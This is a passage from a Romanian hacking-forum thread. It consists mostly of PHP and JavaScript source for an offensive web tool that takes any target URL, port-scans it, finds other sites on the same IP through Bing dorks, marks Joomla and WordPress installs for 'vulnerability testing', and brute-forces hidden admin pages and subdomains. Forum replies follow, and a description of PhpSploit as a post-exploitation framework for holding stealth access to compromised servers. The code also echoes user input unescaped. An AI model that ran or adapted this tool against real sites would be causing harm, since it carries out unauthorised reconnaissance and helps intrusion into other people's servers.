				sqlCheck('dork=' + encodeURIComponent(target.value) + '&setype=' + encodeURIComponent(setype.value));
			}
		}
		else alert("Please stop first...");
	}
	else {
		berhenti();
	}
}
function initpg(){
	document.onkeypress = keyHandler;
}
function berhenti(){
	jalan = false;
}
function bersih(){
	var tanya = confirm("Clear results and restart?");
	if(tanya == true) location.href = 'adm.php';
}
function checkheavy_fix(){
	var heavyval = document.getElementById("heavy");
	if(heavyval.checked) heavyval.checked = false;
	else heavyval.checked = true;
	checkheavy();
}
function checkheavy(){
	var heavyval = document.getElementById("heavy").checked;
	var box = document.getElementById("result")
	if(heavyval) {
		heavy = true;
		box.innerHTML += '<span class=\"red\">*** </span> depth scan...<br />';
	}
	else {
		heavy = false;
		box.innerHTML += '<span class=\"red\">*** </span> quick scan...<br />';
	}
}

</script>


<?php


echo '
</head>
<body>
<br />
<br />
<h1 class="technique-two">



</h1>

<div class="wrapper">
<table><tr><td>
<div class="red">
<div class="tube">
<table width=100% style="background: #222; border: 1px solid #111;"><tr><td align=left><table><tr><td><img src="http://cdn4.iconfinder.com/data/icons/socialmediaicons_v120/32/website.png"></td><td><center><b>WebSite Party</b></center></td></table></table><br>

<form action="" method="post" name="xploit_form">
URL:<br /><input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 100%;" /><br /><br />
404 error page:<br /><input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 100%;" /><br /><br />


<span style="float: right;"><table><tr><td>Verified: <span id="verified">0</span> / <span id="total">0</span></td><td><input type="submit" name="xploit_submit" value="Search !" align="right" /></td></tr><tr><td><br>Stalk3R@live.CoM ***65533; www.sec4ever.com</td></tr></table></span>

</form><br>


';
?>


</div>

<?php


echo '
<br>
</div> <!-- /tube -->
</div> <!-- /red -->
</td><td valign=top>
';
if($_POST['xploit_submit'])
{
echo '
<div class="green">
<div class="tube" id="rightcol">';

echo '
Infos about website:<br>
*******************/<br>


<table width=100% style="background: #222; border: 1px solid #111;">
<td>
<img src="http://open.thumbshots.org/image.pxf?url='.$_POST['xploit_url'].'">
</td>
<td>
<textarea style="width:100%;height:88px;background:#555;margin-left:-15px">If ROBOTS.TXT exist,you see it here
';
$url_robots = str_replace("http://", "", $_POST['xploit_url']); 
$robots = 'http://'.$url_robots.'/robots.txt';
$affiche_robots = file_get_contents($robots);
echo $affiche_robots;

echo '</textarea></td></tr></table>
<br>
Ports scanner:<br>
*************/
<div class="tube" id="portbox">

<table width=100% style="background: #222; border: 1px solid #111;"><tr><td>
';
// Port scanner

$port = array("21", "23", "25", "80", "110", "139", "445", "1433", "1521", "1723", "3306", "3389", "5900", "8080");
$port_name = array("(FTP)", "(TELNET)", "(SMTP)", "(HTTP)", "(POP3)", "(NETBIOS-SSN)", "(MICROSOFT-DS)", "(MS-SQL-S)", "(NCUBE-LM)", "(PPTP)", "(MYSQL)", "(MS-WBT-SERVER)", "()", "(WEBCACHE)");

$site = $_POST['xploit_url'];
$site = str_replace("http://", "", $site);


$ip_target = gethostbyname("".$site."");

for($i=0;$i<12;$i++)
        {
$fp = fsockopen($ip_target,$port[$i],$errno,$errstr,0.1);
if($fp)
{
echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>OPEN</b> on " . $ip_target . "<br>";
fclose($fp);
}
else
{
echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>CLOSED</b> on " . $ip_target . "<br>";
} 
flush();
}

//-------------------------------------------
echo '
</td></table></div>
';

echo '
Found ones:<br />
***********/<br>';



echo '
</div> <!-- /tube -->
</div> <!-- /green -->

</td></tr></table>

<div class="yellow">
';


echo '
Websites on the server:<br>
*********************/<br>
';



if($_POST['xploit_submit'])
{

    $dorkk = "ip:".$ip_target;

    $pageNum = 0;
    for($pageNum = 0; $pageNum < 10; $pageNum++)
    {
        $bing = file_get_contents("http://www.bing.com/search?q=".str_replace(" ","+",$dorkk)."&go=&filt=all&first=".$pageNum."");
        if(!preg_match("/No results found for/",$bing))
        {
            preg_match_all("/<h3><a href=\"(.*?)\">/",$bing,$sites);
            if(count($sites[1])==0)
            {return false;}
            for($i=0 ; $i < count($sites[1]);$i++)
            {
                $site2 = str_replace(array("http://","https://","www."),"",$sites[1][$i]);
                $site2 = substr($site2,0,strpos($site2,"/",0));;
                if(!in_array($site2,$arrayy))
                {

					//Search for JOOMLA & WORDPRESS
					$headers_joomla = @get_headers("http://".$site2."/administrator");
					$headers_wordpress = @get_headers("http://".$site2."/wp-admin");

                    if(strpos($headers_joomla[0],'404') === false)
                    {
                    $joomla = "joomla";
					$site3 = $site2." (JOOMLA) | <a href='#' class='testvuln".$joomla.''.$i."'>TEST VULNERABILITY</a>";
                    echo $site3. "<br>";
					?>
															<script>
//commentaudio
$('.testvuln<?php echo $joomla.''.$i;?>').live("click",function() 
{
$('#showtest<?php echo $joomla.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
$('#showtest<?php echo $joomla.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $joomla; ?>");

return false;
});	
</script>
<div id="showtest<?php echo $joomla.''.$i;?>">
  <p>
 </p>
</div>
                    <?php
                    }
					elseif(strpos($headers_wordpress[0],'404') === false)
					{
					$wordpress = "wordpress";
					$site3 = $site2." (WORDPRESS) | <a href='#' class='testvuln".$wordpress.''.$i."'>TEST VULNERABILITY</a>";
                    echo $site3. "<br>";

					?>
																				<script>
//commentaudio
$('.testvuln<?php echo $wordpress.''.$i;?>').live("click",function() 
{
$('#showtest<?php echo $wordpress.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
$('#showtest<?php echo $wordpress.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $wordpress; ?>");

return false;
});	
</script>
<div id="showtest<?php echo $wordpress.''.$i;?>">
  <p>
 </p>
</div>



					<?php
					}
                    else
                    {
                    echo $site2. " | <a href='#' class='testvuln".$i."'>TEST VULNERABILITY</a><br>";
					$site4 = str_replace("www.", "", $site2);
					$site4 = str_replace("http://", "", $site2);
					?>

<script>

$('.testvuln<?php echo $i;?>').live("click",function() 
{
$('#showtest<?php echo "1".$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
$('#showtest<?php echo "1".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=bing&page=1");
$('#showtest<?php echo "2".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=google&page=1");


return false;
});	
</script>
<div id="showtest<?php echo "1".$i;?>">
  <p>
 </p>
</div>

<div id="showtest<?php echo "2".$i;?>">
  <p>
 </p>
</div>


					<?php
                    }
                    array_push($arrayy,$site2);    
                }

            }
            $pageNum += 10;
        }

    }
    //$array = array_unique($uSites);
    //for($i=0;$i<count($array);$i++){echo $array[$i]."<br />";}
}




echo '

</div>

<br clear="all" /><br />

<div class="blue">
<div class="tube" id="logbox">';



echo '
Admin page Finder: <br />
******************/<br />
</div> <!-- /tube -->
</div> <!-- /blue -->

</div> <!-- /wrapper -->
<br clear="all">';
}
}
function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
    if($br == 1) $msg .= "<br />";
    echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
    if($stop == 1) exit;
    @flush();@ob_flush();
}

function showport($site, $port) { 
    if($br == 1) $msg .= "<br />";
    echo "<script type=\"text/javascript\">insertcode('".$site."', '".$port."');</script>";
    if($stop == 1) exit;
    @flush();@ob_flush();
}
function check($x, $front=0) {
    global $_POST,$site,$false;
    if($front == 0) $t = $site.$x;
    else $t = 'http://'.$x.'.'.$site.'/';
    $headers = get_headers($t);
    if (!eregi('200', $headers[0])) return 0;
    $data = @file_get_contents($t);
    if($_POST['xploit_404string'] == "") if($data == $false) return 0;
    if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
    return 1;
}





// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
template();

if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;

$site = $_POST['xploit_url'];
$site = str_replace("http://", "", $site);
$site = "http://".$site;

if ($site[strlen($site)-1] != "/") $site .= "/";
if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
$list['end'] = str_replace("\r", "", $list['end']);
$list['front'] = str_replace("\r", "", $list['front']);
$pathes = explode("\n", $list['end']);
$frontpathes = explode("\n", $list['front']);
show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
$verificate = 0;
foreach($pathes as $path) {
    show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
    $verificate++; show($verificate, 0, 0, 'verified', 1);
    if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
    else{
        show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
        show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
    }
}
preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
if(substr($site, 0, 3) == "www") $site = substr($site, 4);
foreach($frontpathes as $frontpath) {
    show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
    $verificate++; show($verificate, 0, 0, 'verified', 1);
    if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
    else{
        show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
        show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
    }

}
}
?>

[fadwow]

Nu v? în?eleg de ce nu veni?i ?i cu o descriere la topicul creat s? ?tie to?i utilizatorii despre ce e vorba, asta atât pentru o indexare mai bun? cât ?i pentru în?elegerea topicului at first sight, f?r? a mai sta s? cau?i pe alte site-uri acela?i topic sau informa?ii adi?ionale. Nu mi-o lua în nume de r?u, e doar un sfat pe care eu îl v?d primordial pe un forum.

Succesuri.

PS: Am mai scris ?i o s? scriu în topicurile de genul ?sta, unde e doar aruncat un cod de nu ?tiu câte sute de linii de cod, indiferent de sanc?iunile pe care le risc.

[io.kent]

Sti ce inseamna un PhPSploit?

Ei astai un souce de PHPSploit!

Daca sti ce inseamna atunci sti ce face, la ce se foloseste si cum se foloseste!

Edited February 17, 2014 by io.kent

[fadwow]

Poate c? eu ?tiu ?i ce e ?i ce face. Ideea e alta: Al?ii ?tiu? Tu chiar nu în?elegi unde bat?

[mesterel]

Pai si de ce il mai pui daca nu dai si detalii? Sa te lauzi sau ce?

[SticKyWoX]

Eu nu stiu ce e, explica-mi te rog.

[QUADMACHINE]

Frumos acest multi-tool.

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.